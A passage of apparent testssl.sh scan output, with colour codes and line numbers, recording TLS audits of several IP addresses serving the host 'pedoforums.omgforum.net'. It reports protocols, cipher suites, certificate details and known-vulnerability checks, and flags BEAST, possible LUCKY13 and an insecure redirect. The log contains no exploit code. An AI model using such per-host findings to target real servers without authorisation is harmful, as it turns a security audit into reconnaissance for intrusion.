2917[1m subjectAltName (SAN) [m[3m*.forumotion.com forumotion.com [m
2918[1m Issuer [m[3mAlphaSSL CA - SHA256 - G2[m ([3mGlobalSign nv-sa[m from [3mBE[m)
2919[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
2920[1m Chain of trust[m [0;32mOk [m[0;35m[m
2921[1m EV cert[m (experimental) no
2922[1m Certificate Expiration [m[0;32m395 >= 60 days[m (2017-11-29 08:03 --> 2018-12-30 08:03 -0500)
2923[1m # of certificates provided[m 2
2924[1m Certificate Revocation List [mhttp://crl2.alphassl.com/gs/gsalphasha2g2.crl
2925[1m OCSP URI [mhttp://ocsp2.globalsign.com/gsalphasha2g2
2926[1m OCSP stapling [m[1;33m--[m
2927[1m OCSP must staple [mno
2928[1m DNS CAA RR[m (experimental) [1;33m--[m
2929[1m Certificate Transparency [m[0;32myes[m (certificate extension)
2930
2931
2932[1m[4m Testing HTTP header response @ "/" [m
2933
2934[1m HTTP Status Code [m 301 Moved Permanently, redirecting to "http://pedoforums.omgforum.net/"[0;31m -- Redirect to insecure URL (NOT ok)[m
2935[1m HTTP clock skew [m0 sec from localtime
2936[1m Strict Transport Security [m--
2937[1m Public Key Pinning [m--
2938[1m Server banner [m(no "Server" line in header, interesting!)
2939[1m Application banner [m--
2940[1m Cookie(s) [m(none issued at "/") -- maybe better try target URL of 30x
2941[1m Security headers [m[0;33m--[m
2942[1m Reverse Proxy banner [m--
2943
2944
2945[1m[4m Testing vulnerabilities [m
2946
2947[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m
2948[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
2949[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
2950[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
2951[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
2952[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
2953[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
2954[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
2955[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
2956[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
2957[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
2958[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
2959 make sure you don't use this certificate elsewhere with SSLv2 enabled services
2960 https://censys.io/ipv4?q=A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852 could help you to find out
2961[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mhaproxy 1.5 builtin[m,
2962 but no DH EXPORT ciphers
2963[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES256-SHA
2964 DHE-RSA-AES256-SHA [m
2965 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
2966[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
2967[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
2968
2969
2970[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
2971
2972Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
2973-----------------------------------------------------------------------------------------------------------------------------
2974 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
2975 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
2976 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
2977 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
2978 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
2979 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
2980 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
2981 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
2982
2983
2984[1m[4m Running client simulations via sockets [m
2985
2986 Android 2.3.7 No connection
2987 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2988 Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2989 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2990 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2991 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2992 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2993 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2994 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2995 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2996 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2997 IE 6 XP No connection
2998 IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2999 IE 8 XP No connection
3000 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3001 IE 11 Win 7 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
3002 IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
3003 IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
3004 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3005 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3006 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3007 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3008 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3009 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
3010 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3011 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3012 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3013 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3014 Java 6u45 No connection
3015 Java 7u25 No connection
3016 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
3017 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3018 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3019
3020[7m Done 2017-11-30 00:53:30 [1429s] -->> 94.23.150.222:443 (pedoforums.omgforum.net) <<--[m
3021
3022-----------------------------------------------------
3023[7m Start 2017-11-30 00:53:32 -->> 188.165.2.137:443 (pedoforums.omgforum.net) <<--[m
3024
3025 further IP addresses: 178.33.115.32 94.23.73.212 94.23.159.185 94.23.76.111
3026 178.33.44.177 178.33.43.178 178.33.43.150
3027 94.23.150.222
3028 rDNS (188.165.2.137): --
3029 Service detected: HTTP
3030
3031
3032[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
3033
3034[1m SSLv2 [m[1;32mnot offered (OK)[m
3035[1m SSLv3 [m[1;32mnot offered (OK)[m
3036[1m TLS 1 [moffered
3037[1m TLS 1.1 [moffered
3038[1m TLS 1.2 [m[1;32moffered (OK)[m
3039[1m TLS 1.3 [mnot offered
3040[1m SPDY/NPN [mnot offered
3041[1m HTTP2/ALPN [mnot offered
3042
3043[1m[4m Testing ~standard cipher categories [m
3044
3045[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
3046[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
3047[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
3048[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
3049[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
3050[1m Triple DES Ciphers (Medium) [mnot offered (OK)
3051[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
3052[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
3053
3054
3055[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
3056
3057[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
3058 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
3059 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
3060 DHE-RSA-AES256-SHA ECDHE-RSA-AES128-GCM-SHA256
3061 DHE-RSA-AES128-GCM-SHA256
3062[1m Elliptic curves offered: [m[0;32mprime256v1[m
3063
3064
3065[1m[4m Testing server preferences [m
3066
3067[1m Has server cipher order? [m[1;32myes (OK)[m
3068[1m Negotiated protocol [m[1;32mTLSv1.2[m
3069[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
3070[1m Cipher order[m
3071 TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
3072 TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
3073 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
3074 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256
3075 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
3076 DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA
3077
3078
3079[1m[4m Testing server defaults (Server Hello) [m
3080
3081[1m TLS extensions (standard) [m"server name/#0" "renegotiation info/#65281"
3082 "EC point formats/#11" "session ticket/#35"
3083 "heartbeat/#15"
3084[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
3085[1m SSL Session ID support [myes
3086[1m Session Resumption [mTickets: yes, ID: yes
3087[1m TLS clock skew[m Random values, no fingerprinting possible
3088[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
3089[1m Server key size [mRSA [0;32m4096[m bits
3090[1m Fingerprint / Serial [mSHA1 377DB9566D6D36D2D760ABCF6CB77D31862B02FA / 76AEAF53AC4EA0F66625CCF5
3091 SHA256 A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852
3092[1m Common Name (CN) [m[3m*.forumotion.com[m
3093[1m subjectAltName (SAN) [m[3m*.forumotion.com forumotion.com [m
3094[1m Issuer [m[3mAlphaSSL CA - SHA256 - G2[m ([3mGlobalSign nv-sa[m from [3mBE[m)
3095[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
3096[1m Chain of trust[m [0;32mOk [m[0;35m[m
3097[1m EV cert[m (experimental) no
3098[1m Certificate Expiration [m[0;32m395 >= 60 days[m (2017-11-29 08:03 --> 2018-12-30 08:03 -0500)
3099[1m # of certificates provided[m 2
3100[1m Certificate Revocation List [mhttp://crl2.alphassl.com/gs/gsalphasha2g2.crl
3101[1m OCSP URI [mhttp://ocsp2.globalsign.com/gsalphasha2g2
3102[1m OCSP stapling [m[1;33m--[m
3103[1m OCSP must staple [mno
3104[1m DNS CAA RR[m (experimental) [1;33m--[m
3105[1m Certificate Transparency [m[0;32myes[m (certificate extension)
3106
3107
3108[1m[4m Testing HTTP header response @ "/" [m
3109
3110[1m HTTP Status Code [m 301 Moved Permanently, redirecting to "http://pedoforums.omgforum.net/"[0;31m -- Redirect to insecure URL (NOT ok)[m
3111[1m HTTP clock skew [m-1 sec from localtime
3112[1m Strict Transport Security [m--
3113[1m Public Key Pinning [m--
3114[1m Server banner [m(no "Server" line in header, interesting!)
3115[1m Application banner [m--
3116[1m Cookie(s) [m(none issued at "/") -- maybe better try target URL of 30x
3117[1m Security headers [m[0;33m--[m
3118[1m Reverse Proxy banner [m--
3119
3120
3121[1m[4m Testing vulnerabilities [m
3122
3123[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m
3124[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
3125[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
3126[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
3127[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
3128[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
3129[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
3130[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
3131[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
3132[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
3133[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
3134[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
3135 make sure you don't use this certificate elsewhere with SSLv2 enabled services
3136 https://censys.io/ipv4?q=A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852 could help you to find out
3137[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mhaproxy 1.5 builtin[m,
3138 but no DH EXPORT ciphers
3139[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES256-SHA
3140 DHE-RSA-AES256-SHA [m
3141 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
3142[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
3143[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
3144
3145
3146[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
3147
3148Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
3149-----------------------------------------------------------------------------------------------------------------------------
3150 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
3151 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
3152 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
3153 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
3154 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
3155 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
3156 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
3157 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
3158
3159
3160[1m[4m Running client simulations via sockets [m
3161
3162 Android 2.3.7 No connection
3163 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3164 Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3165 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3166 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
3167 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
3168 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3169 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3170 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3171 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3172 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3173 IE 6 XP No connection
3174 IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3175 IE 8 XP No connection
3176 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3177 IE 11 Win 7 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
3178 IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
3179 IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
3180 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3181 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3182 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3183 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3184 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3185 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
3186 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3187 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3188 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3189 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3190 Java 6u45 No connection
3191 Java 7u25 No connection
3192 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
3193 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3194 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3195
3196[7m Done 2017-11-30 00:57:16 [1655s] -->> 188.165.2.137:443 (pedoforums.omgforum.net) <<--[m
3197
3198-----------------------------------------------------
3199[7m Start 2017-11-30 00:57:18 -->> 178.33.115.32:443 (pedoforums.omgforum.net) <<--[m
3200
3201 further IP addresses: 94.23.73.212 94.23.159.185 94.23.76.111 178.33.44.177
3202 178.33.43.178 178.33.43.150 94.23.150.222
3203 188.165.2.137
3204 rDNS (178.33.115.32): --
3205 Service detected: HTTP
3206
3207
3208[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
3209
3210[1m SSLv2 [m[1;32mnot offered (OK)[m
3211[1m SSLv3 [m[1;32mnot offered (OK)[m
3212[1m TLS 1 [moffered
3213[1m TLS 1.1 [moffered
3214[1m TLS 1.2 [m[1;32moffered (OK)[m
3215[1m TLS 1.3 [mnot offered
3216[1m SPDY/NPN [mnot offered
3217[1m HTTP2/ALPN [mnot offered
3218
3219[1m[4m Testing ~standard cipher categories [m
3220
3221[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
3222[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
3223[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
3224[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
3225[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
3226[1m Triple DES Ciphers (Medium) [mnot offered (OK)
3227[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
3228[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
3229
3230
3231[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
3232
3233[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
3234 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
3235 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
3236 DHE-RSA-AES256-SHA ECDHE-RSA-AES128-GCM-SHA256
3237 DHE-RSA-AES128-GCM-SHA256
3238[1m Elliptic curves offered: [m[0;32mprime256v1[m
3239
3240
3241[1m[4m Testing server preferences [m
3242
3243[1m Has server cipher order? [m[1;32myes (OK)[m
3244[1m Negotiated protocol [m[1;32mTLSv1.2[m
3245[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
3246[1m Cipher order[m
3247 TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
3248 TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
3249 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
3250 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256
3251 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
3252 DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA
3253
3254
3255[1m[4m Testing server defaults (Server Hello) [m
3256
3257[1m TLS extensions (standard) [m"server name/#0" "renegotiation info/#65281"
3258 "EC point formats/#11" "session ticket/#35"
3259 "heartbeat/#15"
3260[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
3261[1m SSL Session ID support [myes
3262[1m Session Resumption [mTickets: yes, ID: yes
3263[1m TLS clock skew[m Random values, no fingerprinting possible
3264[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
3265[1m Server key size [mRSA [0;32m4096[m bits
3266[1m Fingerprint / Serial [mSHA1 377DB9566D6D36D2D760ABCF6CB77D31862B02FA / 76AEAF53AC4EA0F66625CCF5
3267 SHA256 A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852
3268[1m Common Name (CN) [m[3m*.forumotion.com[m
3269[1m subjectAltName (SAN) [m[3m*.forumotion.com forumotion.com [m
3270[1m Issuer [m[3mAlphaSSL CA - SHA256 - G2[m ([3mGlobalSign nv-sa[m from [3mBE[m)
3271[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
3272[1m Chain of trust[m [0;32mOk [m[0;35m[m
3273[1m EV cert[m (experimental) no
3274[1m Certificate Expiration [m[0;32m395 >= 60 days[m (2017-11-29 08:03 --> 2018-12-30 08:03 -0500)
3275[1m # of certificates provided[m 2
3276[1m Certificate Revocation List [mhttp://crl2.alphassl.com/gs/gsalphasha2g2.crl
3277[1m OCSP URI [mhttp://ocsp2.globalsign.com/gsalphasha2g2
3278[1m OCSP stapling [m[1;33m--[m
3279[1m OCSP must staple [mno
3280[1m DNS CAA RR[m (experimental) [1;33m--[m
3281[1m Certificate Transparency [m[0;32myes[m (certificate extension)
3282
3283
3284[1m[4m Testing HTTP header response @ "/" [m
3285
3286[1m HTTP Status Code [m 301 Moved Permanently, redirecting to "http://pedoforums.omgforum.net/"[0;31m -- Redirect to insecure URL (NOT ok)[m
3287[1m HTTP clock skew [m-1 sec from localtime
3288[1m Strict Transport Security [m--
3289[1m Public Key Pinning [m--
3290[1m Server banner [m(no "Server" line in header, interesting!)
3291[1m Application banner [m--
3292[1m Cookie(s) [m(none issued at "/") -- maybe better try target URL of 30x
3293[1m Security headers [m[0;33m--[m
3294[1m Reverse Proxy banner [m--
3295
3296
3297[1m[4m Testing vulnerabilities [m
3298
3299[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m
3300[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
3301[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
3302[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
3303[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
3304[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
3305[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
3306[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
3307[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
3308[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
3309[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
3310[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
3311 make sure you don't use this certificate elsewhere with SSLv2 enabled services
3312 https://censys.io/ipv4?q=A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852 could help you to find out
3313[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mhaproxy 1.5 builtin[m,
3314 but no DH EXPORT ciphers
3315[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES256-SHA
3316 DHE-RSA-AES256-SHA [m
3317 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
3318[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
3319[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
3320
3321
3322[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
3323
3324Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
3325-----------------------------------------------------------------------------------------------------------------------------
3326 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
3327 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
3328 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
3329 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
